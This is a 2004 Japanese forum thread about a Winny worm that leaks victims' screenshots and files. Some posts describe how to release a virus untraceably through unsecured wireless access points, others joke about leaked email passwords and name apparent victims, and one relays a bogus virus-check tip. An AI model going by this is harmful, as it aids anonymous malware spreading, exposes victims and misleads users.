鈴木広多君と山浦克也君はまだ気づいていないのかな?

659 :[名無し]さん(bin+cue).rar:04/11/08 14:24:49 ID:+QkaUY2e
柊のお姉ちゃんなかなか可愛いな
お母さん朝鮮顔なのに何で?

660 :[名無し]さん(bin+cue).rar:04/11/08 14:31:11 ID:mtCVPz7W
晒しはこっちでどうぞ
ここでやると情報が埋もれる

【仙台ギャラクシーエンジェルズ】Winny新ウィルス
http://tmp4.2ch.net/test/read.cgi/download/1099799904/

661 :[名無し]さん(bin+cue).rar:04/11/08 15:15:14 ID:xOMgD8Ty
こういうプログラム組めるのが単純に凄いと関心してしまうのです。

662 :[名無し]さん(bin+cue).rar:04/11/08 15:19:48 ID:+518Z4xD
デスクトップ画像をWinnyで流通させる正体不明のウイルス
〜ネットエージェント杉浦氏「開発者はほぼ特定」
http://internet.watch.impress.co.jp/cda/news/2004/11/08/5303.html

開発者タイ━||Φ|(|゚|∀|゚|)|Φ||━ホ!!!


663 :[名無し]さん(bin+cue).rar:04/11/08 15:22:13 ID:ddz4AHP4
ネットエージェントの言うことはどれをとっても信じられん

664 :[名無し]さん(bin+cue).rar:04/11/08 15:31:20 ID:u7S2CxCF
これに関しては、ただ名前売りたいだけやね。悪質。

665 :[名無し]さん(bin+cue).rar:04/11/08 15:31:32 ID:JMQkBad0
逮捕キタ━━━(゚∀゚)━━━!!!!!

666 :[名無し]さん(bin+cue).rar:04/11/08 15:32:45 ID:LRmpUIHJ
この会社はもう駄目だろうね

667 :[名無し]さん(bin+cue).rar:04/11/08 15:34:36 ID:HJ+47uVe
犯人はネットエージェント杉浦氏か

668 :[名無し]さん(bin+cue).rar:04/11/08 15:43:07 ID:J5bx1k2A
>ネットエージェント杉浦氏「開発者はほぼ特定」

自作自演か

669 :[名無し]さん(bin+cue).rar:04/11/08 15:58:10 ID:PAcf6WX8
作者一般人だとして自分の家のPCから放流するか?

670 :[名無し]さん(bin+cue).rar:04/11/08 15:59:36 ID:ro7uAlye
感染しているわけがないのに、ひたすら自分のユーザー名を打ち込んで検索する小心者の俺……。似たような名前のやつがヒットしてビビりまくった……orz。

671 :[名無し]さん(bin+cue).rar:04/11/08 16:05:58 ID:fI7tpXRH
最近、zipファイルを+Lhacaに持っていってもフォルダ出来るだけで中は空・・・・。
前まで解凍出来たものも出来なくなってる・・・・。   orz
これって亜種かな・・・??

672 :[名無し]さん(bin+cue).rar:04/11/08 16:12:37 ID:dhfVxqAA

特定されますたか。
で、どうすんの?


673 :[名無し]さん(bin+cue).rar:04/11/08 16:14:54 ID:IEkdfN1f
どうやって特定すんだよ

674 :[名無し]さん(bin+cue).rar:04/11/08 16:19:14 ID:XDTLRV2I
ウイルスでP2P使用者が減ると製品が売れなくなるから
小一時間説教する気なんだろう

675 :[名無し]さん(bin+cue).rar:04/11/08 16:23:10 ID:Mf9Lpbcn
nyネットワーク上のあるファイルを最初に流したのは誰か特定できますよ、てことじゃね
ほぼってのは民間が特定できるのは人間じゃないからか

676 :[名無し]さん(bin+cue).rar:04/11/08 16:29:12 ID:EAsdOgY5
+Lhacaてウイルス対策されたかな?

677 :[名無し]さん(bin+cue).rar:04/11/08 16:32:59 ID:1AgzwXGX
結局、仙台の元は何に入ってたんだ?
グリグリ2とこんねこに入ってた1029のAutorun偽装が
2種類ってのは結構報告があるが、オリジナル?の
インストーラ偽装されてる1022物ってどれなんだろうか。

678 :[名無し]さん(bin+cue).rar:04/11/08 16:47:57 ID:DOzjOVgz
誰かの詰合せに入っていたよ>10/22

22日の夜作ったウイルスを24日に見つけたとしたら大したものなのだが、
マルウェア見つけてアンチウイルスベンダーに報告もせず放置しておいて
感染を広げるのは人としてどうだろうか?トカ イッテミル

679 :[名無し]さん(bin+cue).rar:04/11/08 16:50:25 ID:8CoAS7PI
パフォーマンスだな
実際逮捕してから言えと。
こいつはハッカージャパン愛読者のDQNだからな
ただのPCオタ。

680 :[名無し]さん(bin+cue).rar:04/11/08 16:52:02 ID:E27/eMkt
>>671
パス付ZIPなんじゃないか?

今まで解凍出来たものが出来ないというのは解せんが、
+Lhacaはデラックス版じゃないとパス付ZIPは解凍出来ずに
フォルダだけ出来るよ。

つ〜か+Lhacaなんて使うな。

681 :[名無し]さん(bin+cue).rar:04/11/08 16:54:33 ID:4R+NREaM
杉浦隆幸ことluminは、元エセハッカーだろ?
http://www.geocities.co.jp/SiliconValley/6281/

悪のマニュアルとか、書いてる奴の言う事が信じられるか。

682 :[名無し]さん(bin+cue).rar:04/11/08 16:56:31 ID:G3Pj+IRv
仙台はSSからして、エロゲヲタのようだが、私には好きな人がいますは、同一のウイルスなのか?
Search.txt、Download.txtからして、別ルートの別のウィルスじゃないか?
別のものとすれば、どのルートから来たのか?特定されないと不安だ。

683 :[名無し]さん(bin+cue).rar:04/11/08 16:59:23 ID:8CoAS7PI
まぁ俺でも特定はできる
もしエロゲーのexe偽装が大元なら
まず犯人は光ファイバーでないとウィルスを拡散できない
さらにエロゲークラスタに近い人間だろう。

あとは頻繁にキンタマを検索してる人物だな。

アホでも特定できるぜw

684 :[名無し]さん(bin+cue).rar:04/11/08 17:00:14 ID:ExcnklwD
一晩で24000ファイルか・・・
一週間以上気づかずずっと流してくれてるやつも居るな。

685 :[名無し]さん(bin+cue).rar:04/11/08 17:01:30 ID:e3oXRRt1
君のは特定じゃなくて推定だよ

686 :[名無し]さん(bin+cue).rar:04/11/08 17:04:52 ID:8CoAS7PI
>>685
ほぼ特定=推定

特定できんのなら一緒。
糞個人企業はつぶれろやw
資産は1000万だっけかw

687 :[名無し]さん(bin+cue).rar:04/11/08 17:07:51 ID:2KnTL90B
346 名前:番組の途中ですが名無しです[] 投稿日:04/11/06 23:23:41 ID:0lVphXx/
ウィルスの簡単な判別方法見つけたけどいるか?
それ使うと常駐型のウィルスしかわからないが動き出すときにわかるんだけど
とりあえず、張っておくか

解説
最近のウィルスの多様さには驚くべきものがある。
特に常駐型で外部に個人情報を送るウィルスは機密情報が漏れたりと被害が想像も出来ないことになったりもする。
そんな時に常駐型が存在するかを調べる方法を教えよう。

1.WINDOWSのキー(ウィンドウズのロゴのキー)と「E」キーを押しながら待つ

するとプログラムがプロセスを作るときにその内容がポップアップされる。
そのときに外部送信型のウィルスである場合 send smtp等の文字がでた場合は要注意だ。
さらに、IPアドレスのようなものがあった場合はまさに外部に送ろうとしてる瞬間だ。
その場合はそのプログラムの場所を見て一時的に名前を変えておこう。

688 :[名無し]さん(bin+cue).rar:04/11/08 17:08:02 ID:mz4Y6+E9
ホントに通報して逮捕まで持って行ったら少しは認めてやっても良いけど、
基本的にあそこは、ばれない嘘を本当の事っぽく言ってるだけだしな。
信憑性を持たせたかったら京都府Kに逮捕させてみろよと。

というわけで
↓またまたご冗談をのAA

689 :[名無し]さん(bin+cue).rar:04/11/08 17:08:20 ID:XzV+kZM6
俺なんかウイルスなんか自分にゃ無関係と思いながらWinnyやってて
OS飛ぶまでウイルスの存在に気づかなかった
それ以来ノートン入れるようになったわさ

690 :[名無し]さん(bin+cue).rar:04/11/08 17:08:43 ID:e3oXRRt1
ネットエージェントなんて全く信用してないが
オマエよりマシと思う

691 :[名無し]さん(bin+cue).rar:04/11/08 17:31:04 ID:IpZjqFCU
>>689
馬鹿もいいトコだな
で、今度は能登先生を信用しすぎて死ぬわけだな

692 :[名無し]さん(bin+cue).rar:04/11/08 17:41:59 ID:96JTsmaw
svchostでCドライブを検索したら

svchost.exe      C:\WINDOWS\system32
SVCHOST.EX_ .   C:\WINDOWS\i386
svchost.exe      C:\WINDOWS\SoftwareDistribution\Download\1d6fa39895dfc1d3756b5510bca8c7f4

の3つが出たんですがまとめサイトでsystem内のsvchostは問題ないとの事でしたが
残りの二つは削除したほうがいいのでしょうか?
ウイルスバスターではウイルスの検出はありませんでした。

693 :[名無し]さん(bin+cue).rar:04/11/08 17:46:34 ID:dhfVxqAA

…ふぅ〜…


694 :[名無し]さん(bin+cue).rar:04/11/08 17:46:52 ID:yDrmwe1r
ちゃんと読もうや
>>460

695 :[名無し]さん(bin+cue).rar:04/11/08 17:51:20 ID:xOMgD8Ty
>>692
ウイルスバスター嘘付かない。

696 :[名無し]さん(bin+cue).rar:04/11/08 17:52:42 ID:vNCrwsQL
>>692
http://headlines.yahoo.co.jp/hl?a=20041107-00000708-reu-ent.view-000

697 :[名無し]さん(bin+cue).rar:04/11/08 17:52:53 ID:IpZjqFCU
>>692
これからも
┌|*゜o゜|┘よ┌|*゜0゜|┘ろ┌|*゜-゜|┘し┌|*゜。゜|┘く♪

698 :692:04/11/08 17:57:56 ID:96JTsmaw
_| ̄|○  調べてみたら大丈夫のようでした同じような内容が>>36にもありました
        レズ汚してすみませんでした・・・

699 :[名無し]さん(bin+cue).rar:04/11/08 17:59:07 ID:ZkRF1ClK
特定したら明らかにすればいいのに。
神になれるし、技術力の証明にもなるし。
いろんな絡みもあるかもしれないけど大きいほうでなく開発者だけしょっぴけばいい。

700 :[名無し]さん(bin+cue).rar:04/11/08 18:03:14 ID:yC1CK6WV
C:\wingoってフォルダができたんだがコレはキンタマなのか?

ノートンを使ってスキャンしたが無反応
だが、wingoフォルダにはnyのTXTが移ってた(ほかにもIEのキャッシュ等
同症状が出て解決した方いたら情報キボン

http://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.beagle.av@mm.html
これとの関連がありそうだが不明 むろんノートン無反応

当方nyはほとんど使ったことがないんだがキンタマを1日ぐらいにどんなものかと落として大量のスペースのあとに拡張子がついたファイルも見た可能性が皆無ではない

701 :[名無し]さん(bin+cue).rar:04/11/08 18:03:59 ID:PAcf6WX8
なるほど

702 :[名無し]さん(bin+cue).rar:04/11/08 18:07:15 ID:xOMgD8Ty
>>700
ウイルスバスター嘘付かない。

703 :[名無し]さん(bin+cue).rar:04/11/08 18:14:12 ID:r+5xnqAd
ネットエージェントがIPから個人名を特定できるわけないだろ。
裁判所にISPへ開示命令出してもらわないとダメなんだから。

仮に「ほぼ特定」というのが本当だとしても、それはIPレベルの話だろ。
警察にそのIPを教えてるかどうかは不明だけど、調査したらネットカフェから…
という可能性もある。だから「ほぼ」なんだろ。

犯人見付けるのはネットエージェントの仕事じゃないから、
IPを特定するような解析はやってないんじゃないかな。
ていうか、IPレベルの話だとしても特定なんて可能なのか?
「恐らくこのISP会員が犯人」くらいなんじゃないの?

704 :[名無し]さん(bin+cue).rar:04/11/08 18:15:38 ID:yC1CK6WV
バスターノートンだろうがC:\wingoがなんなのかが問題
嘘ついていようがいまいが関係ない

705 :[名無し]さん(bin+cue).rar:04/11/08 18:17:15 ID:PAcf6WX8
なるほどなるほど

706 :[名無し]さん(bin+cue).rar:04/11/08 18:20:40 ID:IpZjqFCU
>>704
そこまで考えが回るとはエロイなお前、研究者にでもなったらどうだ

707 :[名無し]さん(bin+cue).rar:04/11/08 18:21:05 ID:PW0RyUw4
PCルームの使用に学生証の提示が必要ない、管理の甘い大学とかから放流するとか?

708 :[名無し]さん(bin+cue).rar:04/11/08 18:26:08 ID:6+PjKm54
犯人をほぼ特定した、なんて言ったら、犯人がアクション起こしちゃうじゃないか。
逃げるとか、証拠湮滅するとか、自首するとか。

ブラフでほぼ特定と言って、犯人が自首しちゃったら、大笑いだぞ。

709 :[名無し]さん(bin+cue).rar:04/11/08 18:26:14 ID:KhhM27c6
仙台の画像たくさんもってるんだけど、間違えられてタイーホとかないだろうな?
俺はおもしろウイルスが好きなだけなんだけれども・・・

710 :[名無し]さん(bin+cue).rar:04/11/08 18:29:23 ID:ExcnklwD
>>707
それはログインにユーザIDが必要ないことが前提になってしまわないか?

711 :[名無し]さん(bin+cue).rar:04/11/08 18:29:29 ID:3bb93/eA
いったいどういう容疑がかかるというのか?

712 :[名無し]さん(bin+cue).rar:04/11/08 18:31:31 ID:PAcf6WX8
抵触する法律はあるのか
開き直って被害届出す香具師は現れるのか

713 :[名無し]さん(bin+cue).rar:04/11/08 18:31:59 ID:EAsdOgY5
wingoはシステムフォルダだよ

714 :[名無し]さん(bin+cue).rar:04/11/08 18:36:23 ID:ONl6nBaM
>>707
そこまでしなくても、野良APが探せばいくらでも見つかる。
そういうところはたいてい共有管理も甘いから、ny仕込んで
自動起動にしてあらかじめ用意したウイルス入りキャッシュ
も入れておいたら、ウイルス放流ノードにならないか?

715 :[名無し]さん(bin+cue).rar:04/11/08 18:37:55 ID:WwXPsUjt
>>709
誤認逮捕されたら釈放後
鬼の首とったが如く騒いで2chで神になれるぞ









         PCの中が清廉潔白であればな

716 :[名無し]さん(bin+cue).rar:04/11/08 18:41:25 ID:yC1CK6WV
>>713
すくなくとも最近まではなかったし 情報がまったくないのでその可能性はまずないと思ってる
もし情報元があるのなら教えて欲しい そうでなければ信憑性にかける

717 :[名無し]さん(bin+cue).rar:04/11/08 18:44:57 ID:96JTsmaw
8キタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・* !!!!!

718 :[名無し]さん(bin+cue).rar:04/11/08 18:46:12 ID:PW0RyUw4
>>707
・・・それやられると、かなり簡単に完全犯罪できちゃうね。

(((( ;゚Д゚))))

719 :[名無し]さん(bin+cue).rar:04/11/08 18:46:43 ID:PW0RyUw4
失礼。
× >>707
○ >>714

720 :717:04/11/08 18:47:38 ID:96JTsmaw
       ||
     ∧||∧
    ( / ⌒ヽ  すみません・・・誤爆してしまいました・・・ 
     | |   |
     ∪ / ノ
      | ||
      ∪∪

721 :[名無し]さん(bin+cue).rar:04/11/08 18:55:56 ID:8CoAS7PI
そもそも会員証のいらない
ネットカフェですればいいじゃん

722 :[名無し]さん(bin+cue).rar:04/11/08 18:57:14 ID:PW0RyUw4
>>721
ネカフェは監視カメラあるところが多いし、大学もそう。
>>714が安全な放流方法のFAっぽい。

723 :[名無し]さん(bin+cue).rar:04/11/08 18:59:25 ID:ONl6nBaM
>>721
ネカフェは監視カメラで記録取られてること多いよ。
どこかのサイトで、PCの吸気スロットに隠しカメラが仕込まれ
てたって元バイトが暴露してた。

724 :[名無し]さん(bin+cue).rar:04/11/08 19:00:44 ID:PAcf6WX8
変装していかないといけないのか

725 :[名無し]さん(bin+cue).rar:04/11/08 19:03:05 ID:N2ML7hlp
パンツカぶっていけばOKじゃない?

726 :[名無し]さん(bin+cue).rar:04/11/08 19:07:05 ID:E27/eMkt
>>725
間違いなく別の意味で捕まるな。

727 :[名無し]さん(bin+cue).rar:04/11/08 19:07:15 ID:PAcf6WX8
>>725
サンクス、さっそく買ってくるよ

728 :[名無し]さん(bin+cue).rar:04/11/08 19:08:04 ID:CQls8tMJ
antiny Hってなに?

729 :[名無し]さん(bin+cue).rar:04/11/08 19:09:11 ID:N2ML7hlp
>>727
わざわざ新しいの買わなくても手持ちのパンツでOKですよ。

730 :[名無し]さん(bin+cue).rar:04/11/08 19:19:55 ID:YV8blZDb
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] tarte (画像詰め合わせ).zip
このファイルが完全キャッシュとしてあったんで変換しました。
中にはjpgだけでした。exeでもscrでもないのでクリックしても安全ですか?


731 :[名無し]さん(bin+cue).rar:04/11/08 19:22:15 ID:Z8AzuXmC
ハードディスクのデータが消える。ウィルスチェックしてもひっかからない。
なんなんだ!!!!!!!キャッシュ消えるし、どうすれば?

732 :[名無し]さん(bin+cue).rar:04/11/08 19:23:22 ID:6RJtN8K1
>>730
そんなことも分からないならny止めろよ( ´,_ゝ`)プッ

厨はこっちで騒いでろw

【仙台ギャラクシーエンジェルズ】Winny新ウィルス
http://tmp4.2ch.net/test/read.cgi/download/1099799904/l50

733 :[名無し]さん(bin+cue).rar:04/11/08 19:25:25 ID:PAcf6WX8
>>730
これ以上Ny続けたら地獄に落ちるわよ
あしたからShareにしなさい

734 :[名無し]さん(bin+cue).rar:04/11/08 19:25:28 ID:SRpOJSZo
定義ファイルに登録されてなければ引っ掛かるワケないじゃん

735 :[名無し]さん(bin+cue).rar:04/11/08 19:34:31 ID:C2GWcfaY
状況簡単まとめ
・元祖仙台キンタマ
  こん○こ、と、グ○グリ2に混在(もう1本亜種があるらしい)→先生がSillyP2Pとして対策済
  壁紙を赤くする、ファイル詰め合わせ放流、SS放流、ny関連のtxtから情報抽出して放流
・なんだか不明(人為的? 時限発動?)
  仙台キンタマのSS詰め合わせを(画像詰め合わせ)として放流
・[私には好きな…][私はポート0設定…]
  .xls、.doc、.txt、.jpg、を全サーチして詰め合わせにして放流
  仙台キンタマ放流と同等の詰め合わせ(女性名、トリップ無し)に混在の.scrか?
  しかし、放流機能なし。結論。本体特定されず、詳細不明

* ネットエージェントの発言は信じらんね。50件感染どころか、もっといますがな…

736 :[名無し]さん(bin+cue).rar:04/11/08 19:39:13 ID:TkcH4Qvf
 なお、トレンドマイクロやシマンテックでは11月初旬にこのウイルスを認識。
詳細については不明だが、トレンドマイクロでは「WORM_ANTINNY.P」、
シマンテックでは「W32.SillyP2P」とし、それぞれウイルス定義ファイル上の対応は完了済みだという。

737 :[名無し]さん(bin+cue).rar:04/11/08 19:52:12 ID:BchWhdH5
>>735
一番最初は、エロゲのホットギミックフォーエバーのfilesだったはずだが・・・ま、どうでもいい

738 :[名無し]さん(bin+cue).rar:04/11/08 20:19:04 ID:fjILSE6d
wingoフォルダの中身みてもまだこんな所で
呑気に質問なんかしてる椰子って一体・・・

739 :[名無し]さん(bin+cue).rar:04/11/08 20:21:23 ID:OkZqqi2g
norton入れてるからもう安心だな。
さっそくグリグリ2を落とすとしよう。

740 :[名無し]さん(bin+cue).rar:04/11/08 20:22:57 ID:3bb93/eA
過信はすんなよ

741 :[名無し]さん(bin+cue).rar:04/11/08 20:30:10 ID:bA85B2sN
どのグリグリ2が当りなんだろうな(・∀・)ニヤニヤ

742 :[名無し]さん(bin+cue).rar:04/11/08 20:31:12 ID:cvTW0Rup
古いPCでノーガード戦法やってるけど、感染しない(ノ-_-)ノ ~┻━┻
XPじゃなきゃ感染しないの?
つまんねぇぇぇぇぇぇぇぇぇぇ!

743 :[名無し]さん(bin+cue).rar:04/11/08 20:44:47 ID:ExcnklwD
大学生協の展示PCとかならいとも簡単に?

744 :[名無し]さん(bin+cue).rar:04/11/08 20:46:35 ID:wUAEONx9
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] だけど。
昨日の夜9時から今まで、キーワードを登録して放置していたんだが。
すでにファイル数17887、容量2.25GBになっちゃった。

キャッシュ容量は40GBで余裕があるから、ダブりはないはず。


745 :[名無し]さん(bin+cue).rar:04/11/08 20:47:17 ID:ONl6nBaM
既に感染済みです。

746 :[名無し]さん(bin+cue).rar:04/11/08 20:47:39 ID:wgpJZtTi
てかexeファイル起動するやつはどういう神経してんだ…

747 :[名無し]さん(bin+cue).rar:04/11/08 20:49:56 ID:fSyvAUN3
>>746
ノシ

その場のいきおいかな…。
止まれない時ってヤツがあるんだよ…。


748 :[名無し]さん(bin+cue).rar:04/11/08 20:50:33 ID:LrIZ/dIe
なんかおもしろそうだな

つーか明らかに「女性の名前」語ってるの怪しい
コンピュータの名前に「さとみ」とか「えみ」とか変だって

すぐ引っかかるところをみると

需 要 有りみたいですね。名前で人気度わかるなぁ。

749 :[名無し]さん(bin+cue).rar:04/11/08 20:51:59 ID:wgpJZtTi
>>748
エロゲとかアニメとかのキャラ名付けてるんじゃないのか?

750 :[名無し]さん(bin+cue).rar:04/11/08 20:52:21 ID:OkZqqi2g
>>746
だってゲームなんかはexe起動しなきゃしょうがないやん。

751 :[名無し]さん(bin+cue).rar:04/11/08 20:53:58 ID:wgpJZtTi
>>750
ディスクイメージの中身を編集してアイコン偽装してexe差し替えてたりするのか、これ?

752 :[名無し]さん(bin+cue).rar:04/11/08 20:55:32 ID:wUAEONx9
ちなみに一番多い名前が、Ownerだな。つぎがAdministrator。
この2つだけは偶然ファイル名がダブル場合があるようだ。ファイルサイズは違うけど。

753 :[名無し]さん(bin+cue).rar:04/11/08 20:57:20 ID:wgpJZtTi
つうかROやってる香具師が異様に多いな。
ま、RO厨は、こういうのにすぐに引っかかるアフォばかりだしな。

754 :[名無し]さん(bin+cue).rar:04/11/08 20:57:29 ID:4flrYdly
むかつく奴の名前で感染さ!

755 :[名無し]さん(bin+cue).rar:04/11/08 20:58:19 ID:jGQvDAGQ
だけどファイルは自分の個人情報なんだろw

756 :[名無し]さん(bin+cue).rar:04/11/08 20:59:39 ID:q/LrY6ty
嘘ファイルで固めれば悪意有る放流も可能だろうね…
案外そっちの方が厄介なのかも。

757 :[名無し]さん(bin+cue).rar:04/11/08 21:12:31 ID:wgpJZtTi
tarteのが大杉
ROやってるやつ、誰かこいつに教えてやれよ

758 :[名無し]さん(bin+cue).rar:04/11/08 21:14:24 ID:CW/TVGK/

つーかこのスレ偽装レスが多いなw 

759 :[名無し]さん(bin+cue).rar:04/11/08 21:15:48 ID:PAcf6WX8
やっぱエロゲクラスタだとかなり引っかかるのかね
うちはペパーリだから200くらいです

760 :[名無し]さん(bin+cue).rar:04/11/08 21:25:28 ID:p9w5Jtqm
このスレ面白いな

761 :[名無し]さん(bin+cue).rar:04/11/08 21:32:48 ID:C3VsNS+N
つーかexeなんか踏むなよ

762 :[名無し]さん(bin+cue).rar:04/11/08 21:35:16 ID:Jz/n0Q6W
>>761
だってゲームなんかはexe起動しなきゃしょうがないやん。

763 :[名無し]さん(bin+cue).rar:04/11/08 21:35:57 ID:OTIp3lML
>>698
レズかよw

764 :[名無し]さん(bin+cue).rar:04/11/08 21:36:17 ID:C2GWcfaY
[私には好きな…][私はポート0設定…]についての情報収集継続中

誰か、特攻してくれるという奇特な人がいたら、ユーザー名を【特攻】とかにして、
元祖仙台キンタマと、例の.scr偽装ものとの重複感染してくれないかな?



とか、無理ッぽいお願いをしてみる(スタンドアロンで試してるが症状出ないし)。

765 :[名無し]さん(bin+cue).rar:04/11/08 21:44:59 ID:2ULzY0Mg
背徳または破廉恥な行為のある人、
徳義または法律に違反した行為をなした者であっても、
当然に名誉毀損罪の被害者となりうる。

これ常識。非常に興味深いからさらされた人、告訴して。
被疑者不明で。
名誉毀損幇助なんて聞いたこともないので検察が公訴してくれないかな。
著作権違反なんて所詮経済犯罪・・・人権侵害のが重い。
70人もいれば「仙台キンタマ被害者の会w」も出来るでしょ。
なんせ身元はそれぞれわかってるわけだし。

名誉毀損で泣き寝入りしないために http://www.geocities.jp/meiyomamoru/
素人でも行きやすいようにh〜からはじめました。


766 :[名無し]さん(bin+cue).rar:04/11/08 21:46:22 ID:Rhgd1aT/
>>764
元祖仙台キンタマは持ってるけど.scr偽装の奴がない……。

あれば特攻してやってもいいんだが。

767 :[名無し]さん(bin+cue).rar:04/11/08 21:47:30 ID:ClGdkkIh
ネットエージェント杉浦氏「感染経路などにより、開発者はほぼ特定」

タイーホ5秒前

768 :[名無し]さん(bin+cue).rar:04/11/08 21:48:25 ID:wgpJZtTi
>>767
こいつの発言は当てにならん

769 :[名無し]さん(bin+cue).rar:04/11/08 21:48:40 ID:PAcf6WX8
>>765
自分で踏んで訴えればいいじゃん

770 :昨夜の209:04/11/08 21:51:11 ID:B3s8nOB8
649で報告したものですが、その後も順調って感じです。
ある意味upフォルダの悪さ具合が見れないのでny抹消したのは
速断だったかもしれませんが。
再起動してもレジストリはちゃんと出るし、
svchost32が復活する様子も無いです。

トレンドマイクロの新しく対応したファイルは念のために入れておいた方が
良いですか?

>>652
ありがとうございました。名前が似ていたので不安でした。

>>653
初期化は環境ゆえ不可能でした。

>>655
エロゲです。今思うとそう言えば…って場面があったかも。
インスコ後に変なエラーが出続けたゲームがありました。
詳しいことは覚えていませんが。
ただグリグリ2とこんなんとかってのは違いました。
10月下旬から逆算して三つの候補がありますがそれは勘弁して下さい。


771 :[名無し]さん(bin+cue).rar:04/11/08 21:54:49 ID:wgpJZtTi
[041108-1237][無修正][[DVDISO](DVDISO)DVDISO][ナルト][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

これ、中にメールアカウントのIDとPASSとか色々入ってるよ
ワロタ

772 :[名無し]さん(bin+cue).rar:04/11/08 21:58:14 ID:C2GWcfaY
あんまり詳しく知らんのだが、ny環境下で、下記のような
monitorとかtransfer、whoisログを吐くツールってないよね?

2004/11/02 03:24:10DL開始******* ***************.avi
2004/11/02 03:24:14DL計測開始******** *************.avi
2004/11/02 03:38:24DL切断******* ************.avi
2004/11/02 05:06:58UL完了******* ************.avi

ってことは、[私には好きな…][私はポート0設定…]は感染源が ShareとかMXだったり
するのかなぁ…え、それでny上に流すのかぁ?

773 :[名無し]さん(bin+cue).rar:04/11/08 21:58:43 ID:xOMgD8Ty
勘弁して下さい

ワラタ


774 :[名無し]さん(bin+cue).rar:04/11/08 22:03:02 ID:2ULzY0Mg
ウイルス作成罪が施行(まだ国会提出もされてないが)
される前にやっちゃおうとしたのかもね。
電子計算機損壊等業務妨害罪とかは企業相手だし
コンピ破壊しない単なるワームとかじゃ器物損壊も適用ないしね、
このウイルスだと名誉毀損の幇助ってのが無理やり適用できそう。
作成者がファイルUPしなくてもほかの人間の手助けってね。
つーか被害者団結してくれないと警察も動きにくいから。
ほんとはバリバリ取り締まりたいんだから。

775 :[名無し]さん(bin+cue).rar:04/11/08 22:03:32 ID:PAcf6WX8
ていうかPC1台でXPでIEでOEな環境でNyやってる奴がほとんどなのかね
まさにウィルスウェルカムですな

776 :[名無し]さん(bin+cue).rar:04/11/08 22:06:07 ID:2ULzY0Mg
>>769
それじゃおそらく継続しがたい。
だからもっと人数が必要なの。
それに身分明かすわけには行かない。

777 :[名無し]さん(bin+cue).rar:04/11/08 22:07:04 ID:CzBrgBXe
>>775
うわー俺だーってか

まあそんな環境でも、感染しない奴は感染しない罠

778 :[名無し]さん(bin+cue).rar:04/11/08 22:07:35 ID:ra/wDc9n
>>774
まずは手始めに、面白半分で個人情報の拡散に協力している >>771 みたいのを
しょっぴいて欲しいな。

779 :[名無し]さん(bin+cue).rar:04/11/08 22:08:07 ID:D/ZWcQS7
また「原告はお尻ぷりんセスのディスクイメージをダウンロード、マウントして実行」とかなっちゃうじゃないか

780 :[名無し]さん(bin+cue).rar:04/11/08 22:09:02 ID:wgpJZtTi
>>778
キンタマ被害者乙www

781 :[名無し]さん(bin+cue).rar :04/11/08 22:13:35 ID:PA3YrRtG
svchost32.exeと
svchost.exeは違うの?
問題は前者??

782 :[名無し]さん(bin+cue).rar:04/11/08 22:15:02 ID:GzndBrfx
またまた登場

783 :[名無し]さん(bin+cue).rar:04/11/08 22:17:12 ID:IpZjqFCU
>>781
  /il||/〃////,,.-''"´  `ミミミミミミヾヾ、ヾ、ヾ、ヾ、`'''ー─‐
  ,r=ミ、|i川〃/          ミミミミミミヾヾヾヾヾ、ヾ、\`''=
 .!il|゙'7ヾilil/             三三ミミミミミヾヾ;ヾ;ヾ、;ヾヽ、;=
  ヾ,/  V              三三ミミミミミミ;ヾヾ、;;ヾ;;ゞ=三
   .!        ,.,;:;';';';';,,..     三三ミミミミミミヾ;、ゝ;;、ヾ;;;、=;
   |                ≦三三ミミミミミミミ、ヾ;;、ヾ;、;;;≡
   |  二三彡'     ,..,,,;;=''""゙  ヾミミミミミミミミミミヾ;;;、`二三
  ,i゙i、 ゙'''‐ '"   ,,.;;シ"  __,.ィ    iミミミミヾ、ヾ;、ヾ;;、;ヾ、;`==;
   ヾミ;、    _,,,;彡シ _ィ;;;o゚;;/ ,.,.,.;:;: ゙!ミ;iミミヾ、ヾ;:、ヾ;;ヾ;;;、`=;三
    ゙i_ヾミ、 ゙i;;彡'"/´_,ゞ-''",,;';;';';'゙" ゙!゙i、ゞ)ヾメ;;ヾ;;、;;゙ヾ;、゙ヾ;;、、;
    `i、_(;;ヽ   ゙'''   ''"゙^      ゙!゙i、ミく /ミミヾ;、;;゙ヾ;、`=三
      ゙if;  i               i゙i、;i;ノミヾ;;、ヾ;;、ゞ、゙=≡三
     l,  l                i゙!;!;、ヾ;;;、ヾ;、゙ヾ:;、`ヾ;;、≡
     ゙i, /    ,.. )           i゙i;!、ミ、゙、;;ヾ;;、;;ヾ、ヾ≡三
      .゙i,ヽ--、 ヾ;;;;;;ー‐,,.、__      ミミゞ、ヾ、;.-''^゙>、;`=三三
       /;;;、_゙'___,二ス三ミ、     》、ミ、ヾ:;、-''"´_o_,./o⌒ヽ
        il;;i;! `ー一''"´   ヾミ;;;、 ./''^>、ミミミ、=、ヽ、_)! ,X∩、
       ゙i;i;゙i,          ヾミヾ、/-;;;;;;フ'´⌒゙ヽ、 ヽ、_ノ´゙
         ヾ;;!           /,>、ミr;;/ /       ヽ,、o o゙´
         ゙i;,.,.,.,. ,.,.,.,.,._,/// ,ハ;;| ./    く     ゙!`''')゙''i
          i;:;l;i;;:i:;!i;:゙i;Y/ '-^ン⌒);!/             |`´,.-
          ゙i,;:゙i!;ゞ;:ゞ;ヾ;、r'⌒`,=、ヽ'     ど       |'´::::::
          ヾ;、ヾ;;;ヾ、ミミヾ、(__,,,,.-|              |:::::::::
       __,,,,,. -'-'一''''"´´::::::::::::::::::::::l     い       l:::::::::

784 :[名無し]さん(bin+cue).rar:04/11/08 22:19:02 ID:mTE8QO9N
>>781
ttp://www.google.com/search?num=100&as_qdr=all&as_occt=any&as_dt=i&ie=sjis&oe=sjis&lr=lang_ja&as_q=svchost32.exe
ワームかなにかかね
XP SP2の環境ではないファイル。

785 :[名無し]さん(bin+cue).rar:04/11/08 22:21:30 ID:AVVXhfRj
UpFolder.txtをセキュリティレベルで書込み禁止とかにすれば
感染してもnyにUpされることないんだよね??
出来るのか分からんが。

786 :[名無し]さん(bin+cue).rar:04/11/08 22:25:15 ID:C2GWcfaY
>>785
意味ないよ。トロイが直接キャッシュ化して放流、放流後、キャッシュ削除
という場合もあるから(現確されてないがな、可能性はということで)

